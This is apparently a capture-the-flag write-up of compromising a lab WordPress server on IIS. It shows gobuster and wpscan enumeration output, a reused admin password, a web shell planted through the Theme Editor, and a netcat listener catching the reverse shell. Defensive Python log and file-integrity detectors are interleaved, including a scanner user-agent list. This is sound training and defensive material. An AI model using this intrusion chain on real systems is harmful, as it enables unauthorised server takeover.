Port 80
$ gobuster dir -u 10.10.10.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,conf
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.29
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,conf
[+] Timeout: 10s
===============================================================
2021/04/24 20:46:47 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 152] [--> http://10.10.10.29/wordpress/]
$ wpscan --url 10.10.10.29/wordpress -e u
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
[i] Plugin(s) Identified:
[+] mesmerize-companion
| Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/
| Latest Version: 1.6.122
| Last Updated: 2021-04-08T08:54:00.000Z
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
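From the defender's side, every step above leaves a distinctive trace in the IIS request log: a burst of 404s from one client (the gobuster run, which treats 404 as its negative code), tool user agents, hits on the `wp-json/wp/v2/users` endpoint, and `?author=N` probing (the two aggressive wpscan methods listed). The script below is an added example, not part of the original notes: it parses IIS W3C extended log lines (the `#Fields:` header defines the column order) and flags a client IP when any of those patterns appears. The log lines are constructed for the example, the WPScan user-agent string is assumed, and the 404 threshold is a tunable placeholder.

```python
"""Flag WordPress reconnaissance (directory brute force, user enumeration)
in IIS W3C extended logs.  Added example; the log sample is constructed."""
from collections import Counter, defaultdict
from urllib.parse import parse_qs

# Constructed sample.  IIS writes spaces in the user agent as '+', and a
# missing query string as '-'.  The #Fields line fixes the column order.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2021-04-24 20:46:47 10.10.10.29 GET /wordpress/ - 10.10.14.34 gobuster/3.1.0 200
2021-04-24 20:46:47 10.10.10.29 GET /images - 10.10.14.34 gobuster/3.1.0 404
2021-04-24 20:46:47 10.10.10.29 GET /admin.php - 10.10.14.34 gobuster/3.1.0 404
2021-04-24 20:46:48 10.10.10.29 GET /backup.txt - 10.10.14.34 gobuster/3.1.0 404
2021-04-24 20:46:48 10.10.10.29 GET /wordpress - 10.10.14.34 gobuster/3.1.0 301
2021-04-24 20:47:10 10.10.10.29 GET /wordpress/index.php/wp-json/wp/v2/users/ per_page=100&page=1 10.10.14.34 WPScan+v3.8.14 200
2021-04-24 20:47:11 10.10.10.29 GET /wordpress/ author=1 10.10.14.34 WPScan+v3.8.14 301
2021-04-24 20:50:00 10.10.10.29 GET /wordpress/ - 10.10.14.50 Mozilla/5.0 200
2021-04-24 20:50:01 10.10.10.29 GET /wordpress/missing - 10.10.14.50 Mozilla/5.0 404
"""

# Substrings matched case-insensitively against the user agent (extend per environment).
SCANNER_UA = ("gobuster", "wpscan", "dirbuster", "nikto")
# REST endpoint that lists registered users; wpscan used it above.
USER_ENUM_PATHS = ("/wp-json/wp/v2/users",)


def parse_w3c(text):
    """Return one dict per request line, keyed by the names in the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directive lines (#Software, #Date, ...)
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        rows.append(dict(zip(fields, parts)))
    return rows


def detect_recon(rows, not_found_threshold=3):
    """Map client IP -> sorted list of recon indicators seen from that IP.

    not_found_threshold is an assumed value; tune it to the site's normal 404 rate.
    """
    findings = defaultdict(set)
    not_found = Counter()
    for r in rows:
        ip = r["c-ip"]
        ua = r["cs(User-Agent)"].lower()
        stem = r["cs-uri-stem"].lower()
        query = r["cs-uri-query"]
        if any(tag in ua for tag in SCANNER_UA):
            findings[ip].add("scanner user-agent")
        if r["sc-status"] == "404":
            not_found[ip] += 1
        if any(p in stem for p in USER_ENUM_PATHS):
            findings[ip].add("wp-json user enumeration")
        if query != "-" and "author" in parse_qs(query):
            findings[ip].add("author id enumeration")
    for ip, n in not_found.items():
        if n >= not_found_threshold:
            findings[ip].add("directory brute force")
    return {ip: sorted(tags) for ip, tags in findings.items()}


if __name__ == "__main__":
    for ip, tags in detect_recon(parse_w3c(SAMPLE_LOG)).items():
        print(ip, ", ".join(tags))
```

On the constructed sample only 10.10.14.34 is reported; the second client with a single 404 and a browser user agent stays below every rule. Matching on user agent alone is weak (tools can set any string), which is why the 404 rate and the endpoint rules are evaluated independently.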
Using the password from the last box (Vaccine):
admin: P@s5w0rd!
Using the Theme Editor to modify a theme file with the contents of shell.php:
http://10.10.10.29/wordpress/wp-content/themes/twentynineteen/404.php
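The preventive control for this step is to turn the built-in editor off: WordPress honours `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which removes the Theme and Plugin Editor for every role. Where that is not in place, a modified theme file such as the 404.php above is detectable as a file-integrity change. The script below is an added example, not code from the writeup: it hashes a theme directory into a baseline and reports files that were modified, added or removed. The theme directory and file contents are constructed in a temporary directory for the demonstration.

```python
"""Theme-directory integrity check (added example; sample files are constructed).

Baseline the shipped theme files once, then compare on a schedule or after
each deploy.  An edit made through the Theme Editor rewrites the file on disk,
so it shows up as a hash mismatch.
"""
import hashlib
import tempfile
from pathlib import Path


def build_baseline(root):
    """Return {relative_posix_path: sha256_hex} for every file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare_to_baseline(baseline, root):
    """Diff the current tree against a saved baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Build a constructed theme tree, baseline it, then alter it as an edit would."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "twentynineteen"
        theme.mkdir()
        (theme / "404.php").write_text("<?php get_header(); ?>\n")
        (theme / "index.php").write_text("<?php get_header(); ?>\n")
        baseline = build_baseline(theme)

        # Simulated change: a template file rewritten in place and a new file dropped in.
        (theme / "404.php").write_text("<?php /* contents replaced */ ?>\n")
        (theme / "extra.php").write_text("<?php ?>\n")
        return compare_to_baseline(baseline, theme)


if __name__ == "__main__":
    print(demo())
```

In production the baseline would be written to a location the web server's identity cannot modify (the shell above runs as the application-pool account `iis apppool\wordpress`, so anything that account can write is untrusted), and `compare_to_baseline` would run from a scheduled task under a different account.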
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.29] 53206
SOCKET: Shell has connected! PID: 3752
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
whoami
iis apppool\wordpress